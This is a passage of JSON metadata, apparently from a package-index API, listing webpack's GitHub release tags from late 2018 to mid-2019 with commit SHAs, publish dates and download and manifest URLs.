v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4